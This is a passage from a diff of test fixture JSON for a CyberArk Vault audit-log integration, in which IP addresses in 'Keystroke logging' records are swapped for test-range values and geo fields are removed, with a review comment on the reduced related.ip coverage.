su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -329,14 +285,14 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "29f340df-89e9-405a-beae-0216390cda42", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "sudo su" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", 
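Review bot: The `related.ip` array shrinks from three entries to two because the new fixture reuses 67.43.156.15 for both `Station` and `DstHost`, whereas the old data had three distinct hosts; the same collapse occurs in the `@@ -442,16 +377,15 @@` hunk. This drops the only case in these samples where the station address differed from the destination, so the expectation no longer demonstrates that a separate station IP is carried into `related.ip`. If a third address from the supported subset is available, giving `Station` its own value would restore that coverage; otherwise a comment in the test README noting the reduced case would help.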
@@ -346,9 +302,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 15 03:32:04", "desc": "Keystroke logging" 
@@ -359,8 +315,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.191936800Z", - "original": "\u003c5\u003e1 2021-03-15T10:32:04Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:32:04\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:32:04Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:32:04\",\"IsoTimestamp\":\"2021-03-15T10:32:04Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\",\"Message\":\"Keystroke 
logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165104900Z", + "original": "\u003c5\u003e1 2021-03-15T10:32:04Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:32:04\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:32:04Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:32:04\",\"IsoTimestamp\":\"2021-03-15T10:32:04Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", @@ -382,39 +338,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -431,7 +366,7 @@ }, "@timestamp": "2021-03-15T10:33:47.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -442,16 +377,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:33:47Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:47\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:47Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:47\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:47Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -465,14 +399,14 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "sudo su" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", 
@@ -482,9 +416,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 15 03:33:47", "desc": "Keystroke logging" 
@@ -495,8 +429,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.191939300Z", - "original": "\u003c5\u003e1 2021-03-15T10:33:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:47\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:47Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:47\",\"IsoTimestamp\":\"2021-03-15T10:33:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke 
logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165109400Z", + "original": "\u003c5\u003e1 2021-03-15T10:33:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:47\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:47Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:47\",\"IsoTimestamp\":\"2021-03-15T10:33:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 